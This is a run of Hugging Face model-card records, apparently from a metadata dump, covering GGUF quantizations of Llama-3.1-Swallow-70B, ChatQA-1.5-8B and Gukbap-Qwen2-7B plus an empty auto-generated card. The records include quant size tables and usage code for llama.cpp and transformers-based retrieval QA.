mmnga/tokyotech-llm-Llama-3.1-Swallow-70B-Instruct-v0.1-gguf | mmnga | 2024-10-10T09:34:20Z | 210 | 3 | null | [
"gguf",
"en",
"ja",
"dataset:TFMC/imatrix-dataset-for-japanese-llm",
"license:llama3.1",
"license:gemma",
"endpoints_compatible",
"region:us",
"imatrix",
"conversational"
] | null | 2024-10-10T01:38:48Z |
---
license:
- llama3.1
- gemma
language:
- en
- ja
datasets:
- TFMC/imatrix-dataset-for-japanese-llm
---
# tokyotech-llm-Llama-3.1-Swallow-70B-Instruct-v0.1-gguf
This is a gguf-format conversion of [Llama-3.1-Swallow-70B-Instruct-v0.1, published by tokyotech-llm](https://huggingface.co/tokyotech-llm/Llama-3.1-Swallow-70B-Instruct-v0.1).
The imatrix data was created using [TFMC/imatrix-dataset-for-japanese-llm](https://huggingface.co/datasets/TFMC/imatrix-dataset-for-japanese-llm).
# convert
If conversion with llama.cpp fails, try applying [this fix](https://github.com/ggerganov/llama.cpp/pull/9807/files).
## Usage
```
git clone https://github.com/ggerganov/llama.cpp.git
cd llama.cpp
make -j
./llama-cli -m 'tokyotech-llm-Llama-3.1-Swallow-70B-Instruct-v0.1-Q4_0.gguf' -n 128 -c 128 -p 'あなたはプロの料理人です。レシピを教えて' -cnv
```
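If you prefer Python over the llama.cpp CLI, a rough llama-cpp-python sketch (the package install and the local GGUF path are assumptions, not part of the original instructions) would be:

```python
from llama_cpp import Llama

llm = Llama(
    model_path="tokyotech-llm-Llama-3.1-Swallow-70B-Instruct-v0.1-Q4_0.gguf",
    n_ctx=4096,       # context length; adjust to your memory budget
    n_gpu_layers=-1,  # offload all layers to the GPU if one is available
)

out = llm.create_chat_completion(
    messages=[{"role": "user", "content": "あなたはプロの料理人です。レシピを教えて"}],
    max_tokens=128,
)
print(out["choices"][0]["message"]["content"])
```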
|
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-090135 | Trelis | 2024-10-10T09:27:49Z | 102 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T09:26:03Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf | RichardErkhov | 2024-10-10T09:21:35Z | 70 | 0 | null | [
"gguf",
"arxiv:2401.10225",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T05:53:12Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
llama-3-nvidia-ChatQA-1.5-8B - GGUF
- Model creator: https://huggingface.co/grimjim/
- Original model: https://huggingface.co/grimjim/llama-3-nvidia-ChatQA-1.5-8B/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [llama-3-nvidia-ChatQA-1.5-8B.Q2_K.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q2_K.gguf) | Q2_K | 2.96GB |
| [llama-3-nvidia-ChatQA-1.5-8B.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.IQ3_XS.gguf) | IQ3_XS | 3.28GB |
| [llama-3-nvidia-ChatQA-1.5-8B.IQ3_S.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.IQ3_S.gguf) | IQ3_S | 3.43GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q3_K_S.gguf) | Q3_K_S | 3.41GB |
| [llama-3-nvidia-ChatQA-1.5-8B.IQ3_M.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.IQ3_M.gguf) | IQ3_M | 3.52GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q3_K.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q3_K.gguf) | Q3_K | 3.74GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q3_K_M.gguf) | Q3_K_M | 3.74GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q3_K_L.gguf) | Q3_K_L | 4.03GB |
| [llama-3-nvidia-ChatQA-1.5-8B.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.IQ4_XS.gguf) | IQ4_XS | 4.18GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q4_0.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q4_0.gguf) | Q4_0 | 4.34GB |
| [llama-3-nvidia-ChatQA-1.5-8B.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.IQ4_NL.gguf) | IQ4_NL | 4.38GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q4_K_S.gguf) | Q4_K_S | 4.37GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q4_K.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q4_K.gguf) | Q4_K | 4.58GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q4_K_M.gguf) | Q4_K_M | 4.58GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q4_1.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q4_1.gguf) | Q4_1 | 4.78GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q5_0.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q5_0.gguf) | Q5_0 | 5.21GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q5_K_S.gguf) | Q5_K_S | 5.21GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q5_K.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q5_K.gguf) | Q5_K | 5.34GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q5_K_M.gguf) | Q5_K_M | 5.34GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q5_1.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q5_1.gguf) | Q5_1 | 5.65GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q6_K.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q6_K.gguf) | Q6_K | 6.14GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q8_0.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q8_0.gguf) | Q8_0 | 7.95GB |
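To fetch one of these quants programmatically, a small huggingface_hub sketch (the filename is picked arbitrarily from the table above) would be:

```python
from huggingface_hub import hf_hub_download

path = hf_hub_download(
    repo_id="RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf",
    filename="llama-3-nvidia-ChatQA-1.5-8B.Q4_K_M.gguf",
)
print(path)  # local cache path of the downloaded GGUF file
```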
Original model description:
---
base_model:
- nvidia/Llama3-ChatQA-1.5-8B
license: llama3
language:
- en
pipeline_tag: text-generation
tags:
- nvidia
- chatqa-1.5
- chatqa
- llama-3
- pytorch
---
## Model Details
We introduce ChatQA-1.5, which excels at conversational question answering (QA) and retrieval-augmented generation (RAG). ChatQA-1.5 is built using the training recipe from [ChatQA (1.0)](https://arxiv.org/abs/2401.10225), and it is built on top of the Llama-3 foundation model. Additionally, we incorporate more conversational QA data to enhance its tabular and arithmetic calculation capability. ChatQA-1.5 has two variants: ChatQA-1.5-8B and ChatQA-1.5-70B. Both models were originally trained using [Megatron-LM](https://github.com/NVIDIA/Megatron-LM); we converted the checkpoints to Hugging Face format.
## Other Resources
[ChatQA-1.5-70B](https://huggingface.co/nvidia/ChatQA-1.5-70B)   [Evaluation Data](https://huggingface.co/datasets/nvidia/ConvRAG-Bench)   [Training Data](https://huggingface.co/datasets/nvidia/ChatQA-Training-Data)   [Retriever](https://huggingface.co/nvidia/dragon-multiturn-query-encoder)
## Benchmark Results
Results in ConvRAG Bench are as follows:
| | ChatQA-1.0-7B | Command-R-Plus | Llama-3-instruct-70b | GPT-4-0613 | ChatQA-1.0-70B | ChatQA-1.5-8B | ChatQA-1.5-70B |
| -- |:--:|:--:|:--:|:--:|:--:|:--:|:--:|
| Doc2Dial | 37.88 | 33.51 | 37.88 | 34.16 | 38.9 | 39.33 | 41.26 |
| QuAC | 29.69 | 34.16 | 36.96 | 40.29 | 41.82 | 39.73 | 38.82 |
| QReCC | 46.97 | 49.77 | 51.34 | 52.01 | 48.05 | 49.03 | 51.40 |
| CoQA | 76.61 | 69.71 | 76.98 | 77.42 | 78.57 | 76.46 | 78.44 |
| DoQA | 41.57 | 40.67 | 41.24 | 43.39 | 51.94 | 49.6 | 50.67 |
| ConvFinQA | 51.61 | 71.21 | 76.6 | 81.28 | 73.69 | 78.46 | 81.88 |
| SQA | 61.87 | 74.07 | 69.61 | 79.21 | 69.14 | 73.28 | 83.82 |
| TopioCQA | 45.45 | 53.77 | 49.72 | 45.09 | 50.98 | 49.96 | 55.63 |
| HybriDial* | 54.51 | 46.7 | 48.59 | 49.81 | 56.44 | 65.76 | 68.27 |
| INSCIT | 30.96 | 35.76 | 36.23 | 36.34 | 31.9 | 30.1 | 32.31 |
| Average (all) | 47.71 | 50.93 | 52.52 | 53.90 | 54.14 | 55.17 | 58.25 |
| Average (exclude HybriDial) | 46.96 | 51.40 | 52.95 | 54.35 | 53.89 | 53.99 | 57.14 |
Note that ChatQA-1.5 used some samples from the HybriDial training dataset. To ensure fair comparison, we also compare average scores excluding HybriDial. The data and evaluation scripts for ConvRAG can be found [here](https://huggingface.co/datasets/nvidia/ConvRAG-Bench).
## Prompt Format
<pre>
System: {System}
{Context}
User: {Question}
Assistant: {Response}
User: {Question}
Assistant:
</pre>
## How to use
### take the whole document as context
This can be applied to the scenario where the whole document can be fitted into the model, so that there is no need to run retrieval over the document.
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
import torch
model_id = "nvidia/ChatQA-1.5-8B"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.float16, device_map="auto")
messages = [
{"role": "user", "content": "what is the percentage change of the net income from Q4 FY23 to Q4 FY24?"}
]
document = """NVIDIA (NASDAQ: NVDA) today reported revenue for the fourth quarter ended January 28, 2024, of $22.1 billion, up 22% from the previous quarter and up 265% from a year ago.\nFor the quarter, GAAP earnings per diluted share was $4.93, up 33% from the previous quarter and up 765% from a year ago. Non-GAAP earnings per diluted share was $5.16, up 28% from the previous quarter and up 486% from a year ago.\nQ4 Fiscal 2024 Summary\nGAAP\n| $ in millions, except earnings per share | Q4 FY24 | Q3 FY24 | Q4 FY23 | Q/Q | Y/Y |\n| Revenue | $22,103 | $18,120 | $6,051 | Up 22% | Up 265% |\n| Gross margin | 76.0% | 74.0% | 63.3% | Up 2.0 pts | Up 12.7 pts |\n| Operating expenses | $3,176 | $2,983 | $2,576 | Up 6% | Up 23% |\n| Operating income | $13,615 | $10,417 | $1,257 | Up 31% | Up 983% |\n| Net income | $12,285 | $9,243 | $1,414 | Up 33% | Up 769% |\n| Diluted earnings per share | $4.93 | $3.71 | $0.57 | Up 33% | Up 765% |"""
def get_formatted_input(messages, context):
system = "System: This is a chat between a user and an artificial intelligence assistant. The assistant gives helpful, detailed, and polite answers to the user's questions based on the context. The assistant should also indicate when the answer cannot be found in the context."
instruction = "Please give a full and complete answer for the question."
for item in messages:
if item['role'] == "user":
## only apply this instruction for the first user turn
item['content'] = instruction + " " + item['content']
break
conversation = '\n\n'.join(["User: " + item["content"] if item["role"] == "user" else "Assistant: " + item["content"] for item in messages]) + "\n\nAssistant:"
formatted_input = system + "\n\n" + context + "\n\n" + conversation
return formatted_input
formatted_input = get_formatted_input(messages, document)
tokenized_prompt = tokenizer(tokenizer.bos_token + formatted_input, return_tensors="pt").to(model.device)
terminators = [
tokenizer.eos_token_id,
tokenizer.convert_tokens_to_ids("<|eot_id|>")
]
outputs = model.generate(input_ids=tokenized_prompt.input_ids, attention_mask=tokenized_prompt.attention_mask, max_new_tokens=128, eos_token_id=terminators)
response = outputs[0][tokenized_prompt.input_ids.shape[-1]:]
print(tokenizer.decode(response, skip_special_tokens=True))
```
### run retrieval to get top-n chunks as context
This can be applied to the scenario where the document is very long, so that it is necessary to run retrieval. Here, we use our [Dragon-multiturn](https://huggingface.co/nvidia/dragon-multiturn-query-encoder) retriever, which can handle conversational queries. In addition, we provide a few [documents](https://huggingface.co/nvidia/ChatQA-1.5-8B/tree/main/docs) for users to play with.
```python
from transformers import AutoTokenizer, AutoModelForCausalLM, AutoModel
import torch
import json
## load ChatQA-1.5 tokenizer and model
model_id = "nvidia/ChatQA-1.5-8B"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.float16, device_map="auto")
## load retriever tokenizer and model
retriever_tokenizer = AutoTokenizer.from_pretrained('nvidia/dragon-multiturn-query-encoder')
query_encoder = AutoModel.from_pretrained('nvidia/dragon-multiturn-query-encoder')
context_encoder = AutoModel.from_pretrained('nvidia/dragon-multiturn-context-encoder')
## prepare documents, we take landrover car manual document that we provide as an example
chunk_list = json.load(open("docs.json"))['landrover']
messages = [
{"role": "user", "content": "how to connect the bluetooth in the car?"}
]
### running retrieval
## convert query into a format as follows:
## user: {user}\nagent: {agent}\nuser: {user}
formatted_query_for_retriever = '\n'.join([turn['role'] + ": " + turn['content'] for turn in messages]).strip()
query_input = retriever_tokenizer(formatted_query_for_retriever, return_tensors='pt')
ctx_input = retriever_tokenizer(chunk_list, padding=True, truncation=True, max_length=512, return_tensors='pt')
query_emb = query_encoder(**query_input).last_hidden_state[:, 0, :]
ctx_emb = context_encoder(**ctx_input).last_hidden_state[:, 0, :]
## Compute similarity scores using dot product and rank the similarity
similarities = query_emb.matmul(ctx_emb.transpose(0, 1)) # (1, num_ctx)
ranked_results = torch.argsort(similarities, dim=-1, descending=True) # (1, num_ctx)
## get top-n chunks (n=5)
retrieved_chunks = [chunk_list[idx] for idx in ranked_results.tolist()[0][:5]]
context = "\n\n".join(retrieved_chunks)
### running text generation
formatted_input = get_formatted_input(messages, context)
tokenized_prompt = tokenizer(tokenizer.bos_token + formatted_input, return_tensors="pt").to(model.device)
terminators = [
tokenizer.eos_token_id,
tokenizer.convert_tokens_to_ids("<|eot_id|>")
]
outputs = model.generate(input_ids=tokenized_prompt.input_ids, attention_mask=tokenized_prompt.attention_mask, max_new_tokens=128, eos_token_id=terminators)
response = outputs[0][tokenized_prompt.input_ids.shape[-1]:]
print(tokenizer.decode(response, skip_special_tokens=True))
```
## Correspondence to
Zihan Liu ([email protected]), Wei Ping ([email protected])
## Citation
<pre>
@article{liu2024chatqa,
title={ChatQA: Building GPT-4 Level Conversational QA Models},
author={Liu, Zihan and Ping, Wei and Roy, Rajarshi and Xu, Peng and Lee, Chankyu and Shoeybi, Mohammad and Catanzaro, Bryan},
journal={arXiv preprint arXiv:2401.10225},
year={2024}}
</pre>
## License
The use of this model is governed by the [META LLAMA 3 COMMUNITY LICENSE AGREEMENT](https://llama.meta.com/llama3/license/)
|
RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf | RichardErkhov | 2024-10-10T09:17:43Z | 114 | 0 | null | [
"gguf",
"arxiv:2305.11206",
"arxiv:2304.12244",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T06:04:41Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
Gukbap-Qwen2-7B - GGUF
- Model creator: https://huggingface.co/HumanF-MarkrAI/
- Original model: https://huggingface.co/HumanF-MarkrAI/Gukbap-Qwen2-7B/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [Gukbap-Qwen2-7B.Q2_K.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q2_K.gguf) | Q2_K | 2.81GB |
| [Gukbap-Qwen2-7B.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.IQ3_XS.gguf) | IQ3_XS | 3.12GB |
| [Gukbap-Qwen2-7B.IQ3_S.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.IQ3_S.gguf) | IQ3_S | 3.26GB |
| [Gukbap-Qwen2-7B.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q3_K_S.gguf) | Q3_K_S | 3.25GB |
| [Gukbap-Qwen2-7B.IQ3_M.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.IQ3_M.gguf) | IQ3_M | 3.33GB |
| [Gukbap-Qwen2-7B.Q3_K.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q3_K.gguf) | Q3_K | 3.55GB |
| [Gukbap-Qwen2-7B.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q3_K_M.gguf) | Q3_K_M | 3.55GB |
| [Gukbap-Qwen2-7B.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q3_K_L.gguf) | Q3_K_L | 3.81GB |
| [Gukbap-Qwen2-7B.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.IQ4_XS.gguf) | IQ4_XS | 3.96GB |
| [Gukbap-Qwen2-7B.Q4_0.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q4_0.gguf) | Q4_0 | 4.13GB |
| [Gukbap-Qwen2-7B.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.IQ4_NL.gguf) | IQ4_NL | 4.16GB |
| [Gukbap-Qwen2-7B.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q4_K_S.gguf) | Q4_K_S | 4.15GB |
| [Gukbap-Qwen2-7B.Q4_K.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q4_K.gguf) | Q4_K | 4.36GB |
| [Gukbap-Qwen2-7B.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q4_K_M.gguf) | Q4_K_M | 4.36GB |
| [Gukbap-Qwen2-7B.Q4_1.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q4_1.gguf) | Q4_1 | 4.54GB |
| [Gukbap-Qwen2-7B.Q5_0.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q5_0.gguf) | Q5_0 | 4.95GB |
| [Gukbap-Qwen2-7B.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q5_K_S.gguf) | Q5_K_S | 4.95GB |
| [Gukbap-Qwen2-7B.Q5_K.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q5_K.gguf) | Q5_K | 5.07GB |
| [Gukbap-Qwen2-7B.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q5_K_M.gguf) | Q5_K_M | 5.07GB |
| [Gukbap-Qwen2-7B.Q5_1.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q5_1.gguf) | Q5_1 | 5.36GB |
| [Gukbap-Qwen2-7B.Q6_K.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q6_K.gguf) | Q6_K | 5.82GB |
| [Gukbap-Qwen2-7B.Q8_0.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q8_0.gguf) | Q8_0 | 7.54GB |
Original model description:
---
library_name: transformers
tags: []
---
# HumanF-MarkrAI/Gukbap-Qwen2-7B🍚
## Model Details🍚
### Model Description
- **Developed by:** HumanF-MarkrAI
- **Model type:** Ko-Qwen2-7B
- **Language(s):** Korean
- **Context Length:** 8192
- **License:** cc-by-nc-4.0
- **Finetuned from model:** [Qwen/Qwen2-7B-Instruct](https://huggingface.co/Qwen/Qwen2-7B-Instruct).
### Model Sources
When training, we used `A100 40GB GPU`x4.
### Implications🍚
**Achieving Top-Level Korean Language Performance Surpassing GPT-4 Using Only Open-Source LLMs🔥**
Recently, numerous state-of-the-art (SOTA) models **have leveraged data generated by private models (e.g., ChatGPT, GPT-4) for LLM training,** as seen in projects like `OpenOrca`, `Ultrafeedback`, and `OpenHermes`.
However, this approach **may violate these private models' terms of service (ToS).**
For instance, OpenAI's license explicitly states: **"⚠️Use Limitation: Creating services that compete with OpenAI.⚠️"**
This implies that using data generated by private models to create unrestricted, open LLMs is challenging.
In this context, our model is significant in that **it has been trained solely on a proprietary dataset generated through open-source models.** Furthermore, it achieved an impressive score of **🔥6.70🔥** in the Korean LogicKor evaluation, **the SOTA for Korean-based LLMs under 7B parameters.**
The **Gukbap-Series LLM🍚** was developed using the data processing and supervised fine-tuning (SFT) methods proposed by **LIMA** and **WizardLM.** This demonstrates **⭐the potential to create unrestricted, general-purpose LLMs using datasets generated solely with open-source LLMs.⭐**
<details>
<summary> Korean version </summary>
**Achieving top-level Korean performance beyond GPT-4 by generating data with open-source LLMs only🔥**
Today, many SOTA models are **trained on data generated with private models (ChatGPT, GPT-4, etc.)** (OpenOrca, Ultrafeedback, OpenHermes, etc.).
However, this may **violate the private models' terms of service.** For example, OpenAI's license explicitly states: **"⚠️Use Limitation: Creating services that compete with OpenAI.⚠️"** In other words, it is hard to build an unrestricted, free LLM with data created through private models.
From this perspective, our model is significant in that **it was trained on our own dataset generated only through open source.** It also achieved a high score of **🔥6.70🔥** on our internal Korean LogicKor evaluation, which is **SOTA among Korean models under 7B parameters.**
The **Gukbap-Series LLM🍚** was built with the data processing and SFT training methods proposed by **LIMA** and **WizardLM**, and demonstrates **⭐the possibility of building an unrestricted, in-house general LLM with a dataset created only from open-source LLMs.⭐**
